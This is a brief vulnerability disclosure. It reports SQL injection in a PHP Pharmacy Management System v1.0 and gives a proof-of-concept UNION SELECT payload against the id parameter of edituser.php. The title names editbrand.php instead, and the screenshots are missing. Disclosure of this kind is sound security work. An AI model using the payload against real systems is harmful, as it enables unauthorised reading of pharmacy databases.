Introduction

There is a SQL Injection in editbrand.php in Pharmacy Management System v1.0.
I put all the php files to the web root path, so I use /edituser.php, or it can also be placed at /dawapharma/dawapharma/edituser.php etc.

POC

image.png
the “10.3.34-MariaDB-0+deb10ul” is the database version I use, so it is a SQL injection that can echo the content.
POC:

  1. /edituser.php?id=-1%27%20union%20select%201,version(),3,4;--+

Vulnerability Analysis

in the edituser.php, the logic as follows:
image.png
the wabpage use the id parameter as part of sql statement directly.